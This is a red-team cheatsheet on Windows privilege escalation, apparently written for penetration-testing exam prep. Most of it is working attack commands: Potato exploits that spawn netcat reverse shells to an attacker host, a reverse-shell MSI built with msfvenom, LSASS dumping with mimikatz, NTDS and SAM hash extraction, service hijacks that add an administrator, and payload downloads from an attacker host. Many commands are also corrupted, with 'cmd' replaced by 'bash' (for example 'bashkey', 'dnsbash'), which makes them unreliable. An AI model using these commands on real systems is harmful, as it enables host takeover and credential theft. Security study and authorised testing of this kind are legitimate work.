Skip to Content
Red Teaming04-Post-exploitationPrivilege EscalationWindows

Windows Privilege Escalation

Potato attacks, LSASS dumps, service binary swaps, and MSI installs as SYSTEM all write loud process-creation telemetry (EID 4688 / Sysmon 1). Assume Defender/EDR sees PrintSpoofer, GodPotato, mimikatz, and procdump -ma lsass. Prefer LOLBAS and built-in binaries when OPSEC matters.

Cheatsheet

Situational awareness (first 60 seconds)

# Who am I, what can I do, where am I whoami /all hostname systeminfo echo %USERNAME% & echo %USERDOMAIN%

Enumeration quick-fire

# Users / groups / logged-on net user net user %USERNAME% net localgroup net localgroup <GROUP> # detailed info about the group query user bashkey /list # Privileges (CRITICAL check before anything else) whoami /priv whoami /groups # System / patches / installed software systeminfo wmic qfe list brief wmic product get name,version tasklist /svc # Network / dual-homed / localhost-only services ipconfig /all route print arp -a netstat -ano # Services / tasks / unquoted paths sc query type= service state= all wmic service get name,pathname,startmode,startname wmic service get name,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ schtasks /query /fo LIST /v # AlwaysInstallElevated (both must be 1) reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated # Autologon / interesting registry reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Credential hunting one-liners

# Config / history / unattend findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt dir /s /b C:\unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\system32\sysprep\unattend.xml 2>nul
# PS history for every readable user profile foreach ($u in (Get-ChildItem C:\Users -Directory).Name) { Get-Content "C:\Users\$u\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -EA SilentlyContinue } # Local user / computer description fields (often hold passwords) Get-LocalUser | Format-Table Name,Enabled,Description -AutoSize Get-CimInstance Win32_OperatingSystem | Select-Object Description

Automated enumeration

One-tool triage: latest winPEAS  covers most Seatbelt/SharpUp checks run it first, then gap-fill. Prefer PrivescCheck  when you can only run PowerShell (no EXE drop).

# Prefer C:\Windows\Temp or C:\Users\Public for writable drop paths # Primary one pass, read red/yellow first .\winPEASx64.exe bash quiet # Gap-fill only if WinPEAS missed a class of check .\Seatbelt.exe -group=all .\SharpUp.exe audit
# No-EXE path (IEX / copy-paste friendly) PrivescCheck # Transfer PrivescCheck.ps1 first, or host it on <LHOST> Set-ExecutionPolicy Bypass -Scope Process -Force . .\PrivescCheck.ps1 Invoke-PrivescCheck -Extended

Instant-win privilege abuse

# Integrity level whoami /groups # Spooler must be running for PrintSpoofer sc query Spooler # SeImpersonate / SeAssignPrimaryToken choose tool by OS # JuicyPotato: Win7 / Server 2008-2016 (fails on Win10 1809+ / Server 2019+) JuicyPotato.exe -l 1337 -p c:\windows\system32\bash.exe -a "/c c:\temp\nc.exe <LHOST> <LPORT> -e bash.exe" -t * # PrintSpoofer: Win10 / Server 2016-2019 with Spooler up PrintSpoofer.exe -i -c bash PrintSpoofer.exe -c "c:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe" # GodPotato / SweetPotato: broader modern coverage when Juicy/PrintSpoofer fail GodPotato.exe -bash "bash /c whoami" GodPotato.exe -bash "c:\temp\nc.exe <LHOST> <LPORT> -e bash" # Service account with SeImpersonate but "restricted" token (common IIS/MSSQL) restore privs first FullPowers.exe -c "bash /c whoami /priv" FullPowers.exe -c "c:\temp\PrintSpoofer.exe -c c:\temp\nc.exe <LHOST> <LPORT> -e bash"
# SeDebugPrivilege dump LSASS or spawn SYSTEM child procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp
# SeTakeOwnershipPrivilege take file, grant self Full, read takeown /f 'C:\path\to\sensitive.txt' icacls 'C:\path\to\sensitive.txt' /grant %USERNAME%:F type 'C:\path\to\sensitive.txt'

Methodology

Ask before touching the keyboard: Which user am I? What privileges and groups? What OS/build and patch level? What defenses? What runs as SYSTEM that I can influence? What creds hide in files, history, registry, saved sessions? Every missed question is a missed SYSTEM.

Phase 0: Orientation

?

Ask yourself

  • Who am I, and what do my privileges and group memberships actually allow?
  • What OS, build, and patch level is this, and is it a domain-joined host, DC, or standalone?
  • What defenses (Defender, EDR, AppLocker, WDAC, LSA protection) will see my next move?
  • What hosts, shares, and services can this foothold reach that my attack box could not?
  • What credentials, keys, or configs are readable from here?
  • Which privesc or lateral path does the current evidence most cheaply enable?
# Orientation triad identity, host, free privilege wins whoami /all hostname & systeminfo ipconfig /all & netstat -ano
  • Establish identity (whoami /all) user, groups, privileges, integrity level.
  • If already in Administrators at High IL or NT AUTHORITY\SYSTEM → stop privesc, go windows pillaging.
  • If in Administrators at Medium IL → you are UAC-filtered. Treat as not-yet-admin (see UAC notes) or find a path to High/SYSTEM.
  • Fingerprint host (OS name/version/build, domain vs workgroup, architecture, hotfixes).
  • Inventory defenses before noisy tools (Get-MpComputerStatus, AppLocker effective policy).
  • Map dual-homed interfaces, routes, ARP, and localhost-only listeners.
  • Note writable drop directories (C:\Windows\Temp, C:\Users\Public, user profile).
  • Rank candidate paths simplest and quietest first before committing.

Phase 1: Privileges & Dangerous Groups

?

Ask yourself

  • Does whoami /priv show SeImpersonate, SeAssignPrimaryToken, SeDebug, SeBackup/SeRestore, SeTakeOwnership, or SeLoadDriver?
  • Am I in Backup Operators, Server Operators, Print Operators, DnsAdmins, Hyper-V Administrators, or Event Log Readers?
  • Is this a service-account foothold (IIS, MSSQL, Jenkins) where Potato-family abuse is the default next step?
  • Which OS/build dictates JuicyPotato vs PrintSpoofer vs GodPotato?
  • Why check privileges before WinPEAS? Because a single enabled privilege can end the engagement in under a minute.
# Privileges and group membership instant-win screen whoami /priv whoami /groups sc query Spooler net localgroup
  • whoami /priv if SeImpersonate/SeAssignPrimaryToken present, go Potato immediately (tool by OS).
  • Service-account shell with SeImpersonate but missing expected privs / broken Potato → try FullPowers to spawn a normal token, then Potato again.
  • Before PrintSpoofer: sc query Spooler must be RUNNING. If stopped and you cannot start it, use GodPotato/SweetPotato/RoguePotato instead.
  • SeDebugPrivilege → dump LSASS with ProcDump / Task Manager, or spawn SYSTEM via parent-process abuse.
  • SeBackupPrivilege/SeRestorePrivilege (or Backup Operators) → reg save SAM/SYSTEM, or diskshadow + copy NTDS.dit on a DC.
  • SeTakeOwnershipPrivilege → takeown + icacls on high-value files (web.config, creds, keys).
  • SeLoadDriverPrivilege (Print Operators) → load vulnerable driver (Capcom.sys pattern). Note post-Win10 1803 HKCU restrictions.
  • Server Operators → rewrite a SYSTEM service binPath, start it, get admin.
  • DnsAdmins → dnsbash /config /serverlevelplugindll
  • Event Log Readers → mine Security 4688 command lines for /user passwords via wevtutil.
  • If no privilege/group win, continue to Phase 2.

Phase 2: Services, Tasks & Weak Permissions

?

Ask yourself

  • Can I modify a service’s binary, binPath, or registry ImagePath as a non-admin?
  • Is any auto-start service path unquoted with a writable intermediate directory?
  • Do scheduled tasks run as SYSTEM/Administrator with a writable script or Start In directory?
  • Are both AlwaysInstallElevated registry values set to 1?
  • Can I start/stop the vulnerable service myself, or must I wait for reboot/admin action?
# Service / task / ACL / AlwaysInstallElevated checks wmic service get name,pathname,startmode,startname accesschk.exe /accepteula -uwcqv "Authenticated Users" * accesschk.exe /accepteula -uwcqv "Everyone" * icacls "C:\Program Files (x86)\VulnerableApp\service.exe" schtasks /query /fo LIST /v reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  • Enumerate services and flag those running as LocalSystem with non-C:\Windows paths.
  • Weak service binary ACL (Everyone/Users:(F)) → replace binary, start service, catch SYSTEM shell.
  • Weak service permissions (SERVICE_ALL_ACCESS) → sc config <SVC> binpath= "bash /c ...", stop/start.
  • Unquoted path → place payload at first writable space-separated candidate. Confirm restart rights.
  • Weak service registry ACL → Set-ItemProperty on ImagePath.
  • Scheduled task as SYSTEM with writable script → append reverse shell / add-admin. Trigger or wait.
  • AlwaysInstallElevated both 0x1 → malicious MSI via msiexec /quiet /qn /norestart.
  • Autoruns (HKLM\...\Run, startup folders) writable by your user → plant for next admin logon (may not be SYSTEM).

Phase 3: Credential Hunting

?

Ask yourself

  • Which cleartext or encoded passwords exist in configs, history, unattend, registry, or sticky notes?
  • Do bashkey /list saved creds let me runas /savecred or RDP as another user?
  • Can I decrypt a DPAPI-protected Export-Clixml credential as the same user/machine?
  • Which recovered credential should I spray against local admin, WinRM, RDP, MSSQL, and domain next?
  • Did I check every other user’s readable profile, not just my own?
# High-yield credential locations bashkey /list reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml dir /s /b *unattend* *web.config *pass* *.kdbx *.vmdk *.vhdx 2>nul
# History, PS creds, browser/dict leftovers gc (Get-PSReadLineOption).HistorySavePath -EA SilentlyContinue # If you find Export-Clixml creds as that user: $c = Import-Clixml -Path 'C:\scripts\pass.xml'; $c.GetNetworkCredential() | fl *
  • PowerShell history for all readable users. Look for /user, -p, ConvertTo-SecureString, net use.
  • unattend.xml / sysprep leftovers: plaintext or base64 passwords.
  • web.config, app configs, .env, connection strings under C:\inetpub and Program Files.
  • Autologon (DefaultUserName / DefaultPassword), PuTTY sessions, WiFi profiles (netsh wlan show profile key=clear).
  • bashkey /list → runas /savecred /user:<USER> bash.exe when applicable.
  • Sticky Notes DB (plum.sqlite), browser stores (LaZagne), password managers, .rdp files.
  • Mount found .vmdk/.vhdx backups → extract SAM/SYSTEM → impacket-secretsdump LOCAL.
  • Recycle every recovered credential against local admins, WinRM, RDP, SQL, and other hosts before Phase 4.

Phase 4: Kernel, Vulnerable Software & Local Services

?

Ask yourself

  • Does systeminfo / hotfix list match a known LPE, and have I confirmed the exact build?
  • Is a third-party service (backup agent, AV, VPN, monitoring forwarder) outdated with a public LPE?
  • Are there localhost-only admin interfaces (FileZilla, Splunk UF, Erlang/RabbitMQ) reachable only from this shell?
  • Have I exhausted privileges, groups, ACLs, and creds before touching a kernel exploit?
  • What is the blast radius if the exploit bluescreens a production host?
# Patch / software / localhost attack surface systeminfo wmic qfe get HotFixID,InstalledOn wmic product get name,version tasklist /svc netstat -ano | findstr LISTENING
# On attack box: map systeminfo to known CVEs wes.py systeminfo.txt # Or Watson / Windows-Exploit-Suggester against the same output
  • Record exact OS build and installed KBs. Only pursue exploits whose prerequisites match.
  • Prefer third-party service LPEs over kernel exploits when versions match (often more reliable).
  • Probe localhost listeners (e.g. FileZilla admin, Splunk UF, Erlang 25672) for unauth or weak-cookie RCE as SYSTEM/service.
  • Legacy hosts (XP/2003/2008/Win7): consider MS08-067 / MS17-010 via local port-forward if SMB is firewalled externally.
  • GUI + unpatched Certificate Dialog → CVE-2019-1388 (hhupd.exe) path if build is in range.
  • Kernel exploit only after documenting version match, OPSEC cost, and client approval on fragile hosts.

Phase 5: Automation Fallback & Recovery

?

Ask yourself

  • What did WinPEAS/Seatbelt/SharpUp mark red or yellow that I have not manually validated?
  • Which Phase 0–4 assumption failed, and what evidence contradicts it?
  • Am I missing a dual-homed pivot, a readable share, or a credential I already found elsewhere?
  • Should I re-run orientation after any new group/cred, instead of jumping to noisier tools?
# Full automated pass: validate every finding manually .\winPEASx64.exe bash quiet > C:\Users\Public\wp.txt
# If EXE blocked: PrivescCheck only . .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended | Tee-Object C:\Users\Public\prc.txt
# Gap-fill only after WinPEAS/PrivescCheck triage .\Seatbelt.exe -group=all .\SharpUp.exe audit
  • Run WinPEAS (or PrivescCheck if no EXE). Triage red/yellow only. Do not start with three overlapping tools.
  • Gap-fill with Seatbelt/SharpUp/PowerUp only for unresolved classes of findings.
  • Manually re-check every automated “hit”. Tools false-positive and false-negative.
  • Re-walk Phase 0–3 with any new credentials or group changes.
  • If stuck: re-read assumptions, try FullPowers → GodPotato, expand credential search to shares, take a break, then reassess from identity outward.
  • Capture evidence (commands, output, screenshots, timestamps) for the report before cleanup.
  • After SYSTEM → switch to Windows Pillaging (donpapi / nxc / lsassy), not more local enum.

How It Works

Windows authorization is token-based. At logon the LSA builds an access token containing the user’s SID, group SIDs, and privileges. Every process inherits a copy. Privilege escalation means obtaining a more powerful token (SYSTEM/admin) or abusing a privilege already present on the current token.

Service accounts for IIS, MSSQL, and similar often receive SeImpersonatePrivilege so they can act on behalf of connecting clients. Potato-family attacks coerce a SYSTEM service into authenticating to an attacker-controlled pipe/COM object, then reuse that SYSTEM token to spawn a process. Dangerous built-in groups package powerful privileges (SeBackup/SeRestore, SeLoadDriver, service control) under a “least privilege” label that is still enough for domain or host compromise.

Misconfigured services are the other common path: the SCM launches binaries as SYSTEM. If a low-priv user can change the binary, the binPath, or a file the SYSTEM process loads (DLL hijack), they inherit SYSTEM. Credentials on disk short-circuit all of this. Password reuse often beats exploitation.

Reference

Dangerous privileges (quick map)

PrivilegeTypical abuseNotes
SeImpersonatePrivilegeJuicyPotato / PrintSpoofer / GodPotato / SweetPotatoCommon on IIS/MSSQL service accounts
SeAssignPrimaryTokenPrivilegeSame Potato familyOften paired with SeImpersonate
SeDebugPrivilegeDump LSASS. Spawn SYSTEM child via parent PIDNoisy. EDR loves this
SeBackupPrivilegeCopy any file with backup semantics. reg save SAM/SYSTEM. NTDS via diskshadowBackup Operators
SeRestorePrivilegeOverwrite protected files. Plant services/DLLOften with SeBackup
SeTakeOwnershipPrivilegetakeown then rewrite ACLEdge case but high value on locked files
SeLoadDriverPrivilegeLoad vulnerable kernel driverPrint Operators. Constrained since Win10 1803
SeCreateTokenPrivilege / SeTcbPrivilegeArbitrary token / act as OSRare outside admin-equivalent

Built-in groups that matter

GroupWhy it wins
Backup OperatorsSeBackup/SeRestore. DC logon. NTDS.dit via diskshadow. SAM/SYSTEM hive save
Server OperatorsFull control over many local services. Rewrite binPath as SYSTEM
Print OperatorsSeLoadDriverPrivilege. DC logon
DnsAdminsLoad arbitrary DNS plugin DLL as SYSTEM (DC impact). WPAD record abuse
Hyper-V AdministratorsVM disk access / DC clone. Hard-link races on older builds
Event Log ReadersRead Security log harvest passwords from 4688 command lines

SeImpersonate / Potato tool selection

TargetPreferAvoid
Win7 / Server 2008–2016JuicyPotato
Win10 / Server 2019 with SpoolerPrintSpoofer, RoguePotatoJuicyPotato (broken post-1809)
Modern / hardened / Spooler deadGodPotato, SweetPotatoAssuming one tool works everywhere
# JuicyPotato: COM CLSID abuse (older hosts) JuicyPotato.exe -l 53375 -p c:\windows\system32\bash.exe -a "/c c:\temp\nc.exe <LHOST> <LPORT> -e bash.exe" -t * # PrintSpoofer: printer spooler named pipe PrintSpoofer.exe -i -c bash PrintSpoofer.exe -c "c:\temp\nc.exe <LHOST> <LPORT> -e bash" # GodPotato: broad modern fallback GodPotato.exe -bash "c:\temp\nc.exe <LHOST> <LPORT> -e bash"

SeBackupPrivilege: SAM / NTDS

# Enable + copy protected file (SeBackupPrivilege PoC modules) Import-Module .\SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegebashLets.dll Set-SeBackupPrivilege Copy-FileSeBackupPrivilege 'C:\Confidential\secret.txt' .\secret.txt
# Local SAM/SYSTEM (works with SeBackup) reg save HKLM\SAM C:\temp\SAM.SAV reg save HKLM\SYSTEM C:\temp\SYSTEM.SAV reg save HKLM\SECURITY C:\temp\SECURITY.SAV
# DC: shadow copy then copy NTDS.dit (diskshadow interactive) set verbose on set metadata C:\Windows\Temp\meta.cab set context clientaccessible set context persistent begin backup add volume C: alias cdrive create expose %cdrive% E: end backup
# After expose: backup-mode copy (no external DLL needed) robocopy /B E:\Windows\NTDS C:\temp\ntds ntds.dit
# Offline hash extraction impacket-secretsdump -sam SAM.SAV -system SYSTEM.SAV LOCAL impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV LOCAL

SeDebugPrivilege

# Dump LSASS (transfer dump offline if Mimikatz blocked on-box) procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp
# Mimikatz against the dump (prefer offline) privilege#debug sekurlsa#minidump lsass.dmp sekurlsa#logonpasswords

GUI alternative with RDP: Task Manager → Details → lsass.exe → Create dump file.

Server Operators: service binPath

sc qc AppReadiness sc config AppReadiness binPath= "bash /c net localgroup Administrators <USER> /add" sc start AppReadiness net localgroup Administrators # Revert binPath after proof

DnsAdmins: plugin DLL

Restarting DNS on a DC can take down name resolution for the environment. Get explicit approval, have a cleanup plan, and prefer a non-destructive proof when the client allows it.

# Full path required dnsbash.exe /config /serverlevelplugindll C:\Users\<USER>\adduser.dll sc stop dns sc start dns # Cleanup from elevated admin context reg delete HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll /f sc start dns

WPAD alternative (also DnsAdmins):

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName <DC> Add-DnsServerResourceRecordA -Name wpad -ZoneName <DOMAIN> -ComputerName <DC> -IPv4Address <LHOST>

Weak service permissions

# Find writable service configs / binaries accesschk.exe /accepteula -uwcqv "Authenticated Users" * accesschk.exe /accepteula -quvcw <ServiceName> icacls "C:\Program Files (x86)\App\service.exe" # Abuse SERVICE_CHANGE_CONFIG sc config <ServiceName> binpath= "bash /c net localgroup administrators <USER> /add" sc stop <ServiceName> sc start <ServiceName>

Unquoted service path

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ sc qc <ServiceName> # If path is C:\Program Files (x86)\Vulnerable App\svc.exe # and you can write C:\Program Files (x86)\Vulnerable.exe. Plant payload there

Exploitable only when an intermediate directory is writable and you can restart the service (or wait for reboot). Root of C:\ and Program Files usually need admin. Many unquoted paths are not exploitable.

AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both values must be 0x1 msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f msi -o aie.msi
msiexec /i C:\Users\Public\aie.msi /quiet /qn /norestart

Scheduled tasks

schtasks /query /fo LIST /v icacls C:\Scripts\ # If Users:(W) on a SYSTEM-run script: append payload, wait or: schtasks /run /tn "<TaskName>"
Get-ScheduledTask | Where-Object { $_.Principal.UserId -match 'SYSTEM|Administrator' } | Select-Object TaskName,TaskPath,State

Low-priv users often cannot read C:\Windows\System32\Tasks. Custom tasks in world-writable directories are the real prize.

Credential locations (extended)

LocationCommand / path
PS history%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
UnattendC:\Windows\Panther\Unattend.xml, C:\Windows\system32\sysprep\
IISC:\inetpub\wwwroot\web.config (and other sites)
AutologonHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Saved sessionsbashkey /list. PuTTY / WinSCP / FileZilla / RDP files
Sticky Notes...\Microsoft.MicrosoftStickyNotes_*\LocalState\plum.sqlite
WiFinetsh wlan show profiles then key=clear
VHD/VMDK backupsguestmount / Disk Management → SAM/SYSTEM → secretsdump
Registry password sweepreg query HKLM /f password /t REG_SZ /s
# DPAPI PSCredential XML: only as the same user/machine that created it $credential = Import-Clixml -Path 'C:\scripts\pass.xml' $credential.GetNetworkCredential().UserName $credential.GetNetworkCredential().Password
# Event Log Readers: passwords in process command lines wevtutil qe Security /rd:true /f:text | findstr /i "/user"

DLL hijacking (summary)

Order of abuse checks:

  1. Application directory missing DLL that the SYSTEM/auto-start app loads.
  2. Writable directory earlier in %PATH% than the real DLL location.
  3. Knowndlls / SafeDllSearchMode may block trivial plants. Confirm load path with Procmon (NAME NOT FOUND / PATH NOT FOUND).

Proxy DLLs and reflective injection are situational. For exam/lab privesc, prefer missing-DLL plants on auto-start SYSTEM services.

Localhost & vulnerable services

netstat -ano | findstr LISTENING # Prioritize 127.0.0.1 / #1 listeners not bound on 0.0.0.0

High-value patterns from assessments:

  • FileZilla admin port (often 14147 on loopback): config/password exposure, filesystem access as service user.
  • Splunk Universal Forwarder: historically unauth app deploy as SYSTEM.
  • Erlang distribution port (25672): weak/default cookie (rabbit on RabbitMQ) → cluster join → RCE.

Kernel & notable CVEs

Prefer wes-ng / Watson against live systeminfo output over memorized CVE tables. Confirm build + patch level before running any kernel PoC. last verified: 2026-08

BugUse as LPE when
MS08-067 / MS17-010Legacy hosts. Forward local 445 if firewalled externally
CVE-2019-1388GUI access + vulnerable cert dialog (hhupd.exe)
CVE-2020-0668 etc.Matching unpatched build. Validate with suggester first

Kernel exploits are last in the methodology for a reason: stability risk, AV signature density, and frequent patch status.

UAC notes (CPTS trap)

Membership in Administrators with a Medium integrity token is not full admin. Privileged operations need High integrity (elevated) or a UAC bypass. Print Operators often need an elevated token before SeLoadDriverPrivilege appears. Prefer finding a path that yields a High/SYSTEM token over fighting UAC unless GUI/RDP is available and bypasses are in scope.

# Spot the trap whoami /groups # Look for: BUILTIN\Administrators ... Group used for deny only # And: Mandatory Label\Medium Mandatory Level (not High)

Practical exam escapes when you are “admin but not elevated”:

SituationMove
Have cleartext/NTLM for a local adminrunas / evil-winrm / nxc / impacket-psexec for a fresh High/SYSTEM session
SeImpersonate presentPotato → SYSTEM (skips UAC entirely)
Writable SYSTEM service / AlwaysInstallElevatedAbuse → SYSTEM
GUI/RDP + creds”Run as administrator” or scheduled task created as admin
Only Medium admin, no other pathFodhelper/other UAC bypasses if in scope. Last resort vs finding another vector

On CPTS, landing bob who is in local Administrators but your web shell is Medium IL is common. Do not spend an hour “enumerating privesc”. Get a proper admin session with the password/hash you already have (evil-winrm, runas, WinRM, PsExec-style).

FullPowers (restricted service tokens)

IIS / MSSQL / service shells sometimes show SeImpersonatePrivilege but Potato fails or many privileges appear disabled because the token is restricted. FullPowers  recovers a full token for the same user, after which PrintSpoofer/GodPotato usually work.

FullPowers.exe -c "bash /c whoami /all" FullPowers.exe -c "c:\temp\GodPotato.exe -bash \"c:\temp\nc.exe <LHOST> <LPORT> -e bash\""

CPTS: common foothold → SYSTEM chains

FootholdFirst checkTypical win
xp_bashshell / MSSQLwhoami /privSeImpersonate → PrintSpoofer/GodPotato
IIS / wwwroot webshellApp-pool identity privsSame Potato path. FullPowers if restricted
Uploaded binary as low-priv userGroups + file credsAlwaysInstallElevated, weak service, history/Autologon
RDP as domain userLocal admin group? Medium IL?Cred reuse / Potato / ACL misconfig
Backup Operators on DCSeBackupdiskshadow + NTDS → domain hashes

After SYSTEM on a domain-joined host, do not stop. Pillage (especially LSASS / logged-on admins) and spray. Local SYSTEM is a waypoint, not the CPTS finish line.

Automated tools

ToolRolePrefer when
winPEAS Broad local enum (Seatbelt-class checks folded in)Default first automated pass. Read red/yellow
PrivescCheck PS misconfig enum, structured outputEXE blocked / PS-only shell
FullPowers Restore full service tokenIIS/MSSQL Potato fails / privs look stripped
GodPotato SeImpersonate → SYSTEMModern Windows. Spooler dead or PrintSpoofer fails
Seatbelt Targeted host/security checksGap-fill after WinPEAS
SharpUp  / PowerUp Misconfig-focused checks + abuse helpersGap-fill / no WinPEAS binary
Watson  / WES-NG Missing KB → CVE mappingAfter misconfigs exhausted
AccessChk / PsService (Sysinternals)Service and ACL truthValidate WinPEAS “writable service” hits

Post-SYSTEM credential harvest is not this note. Use DonPAPI / nxc / lsassy in Windows Pillaging.

Upload to C:\Windows\Temp or C:\Users\Public when user-writable dirs are scarce. Compile from source for client work. Public binaries are signatured.

File transfer reminders

# Target-side fetch examples: see File-Transfers note for full catalogue certutil -urlcache -f http://<LHOST>/<FILE> C:\Windows\Temp\<FILE> powershell -c "IWR http://<LHOST>/<FILE> -OutFile C:\Windows\Temp\<FILE>"

Common Mistakes

  • Running WinPEAS before whoami /priv and missing an instant Potato win on a service account.
  • Launching WinPEAS + Seatbelt + SharpUp + PowerUp together. Use one triage tool first, then gap-fill later.
  • Using JuicyPotato on Server 2019 / Win10 1809+ instead of PrintSpoofer/GodPotato.
  • PrintSpoofer against a stopped Spooler. Check sc query Spooler or switch to GodPotato.
  • Treating Medium-IL local Administrators membership as “already done” and never getting a High/SYSTEM token.
  • Potato failing on IIS/MSSQL without trying FullPowers on a restricted service token.
  • Treating every unquoted service path as exploitable without confirming a writable intermediate path and restart rights.
  • Kernel exploits before privileges, groups, service ACLs, and credential reuse.
  • Stopping at local SYSTEM on a domain-joined host instead of pillaging (donpapi/nxc/lsassy) and moving laterally.
  • Not recycling discovered credentials against WinRM, RDP, MSSQL, and other hosts.
  • DnsAdmins / diskshadow / service binPath changes without cleanup or client approval.
  • Leaving replaced service binaries, MSI payloads, or plugin DLL registry keys behind.

Quiz

You landed a shell as nt service\mssql$sqlexpress on Server 2019. whoami /priv shows SeImpersonatePrivilege Enabled. What is the best next move?

Quiz

whoami /groups shows Backup Operators on a Domain Controller. Which action correctly abuses the access?

Quiz

SharpUp reports an unquoted auto-start SYSTEM service at C:\\Program Files (x86)\\Vuln App\\svc.exe. icacls shows you cannot write under Program Files or C:\\. What do you do?

Quiz

whoami /groups shows BUILTIN\\Administrators (Group used for deny only) and Mandatory Label\\Medium Mandatory Level. You also have the user's password. Best CPTS move?

#Windows #PrivilegeEscalation #RedTeam #PenetrationTesting #HTB #OSCP #PostExploitation #AccessControl #TokenAbuse #ServiceAccounts #ActiveDirectory #DPAPI #System #CPT #BlueTeam #Sysmon #Enumeration #LPE #Certification #CredentialAccess

Last updated on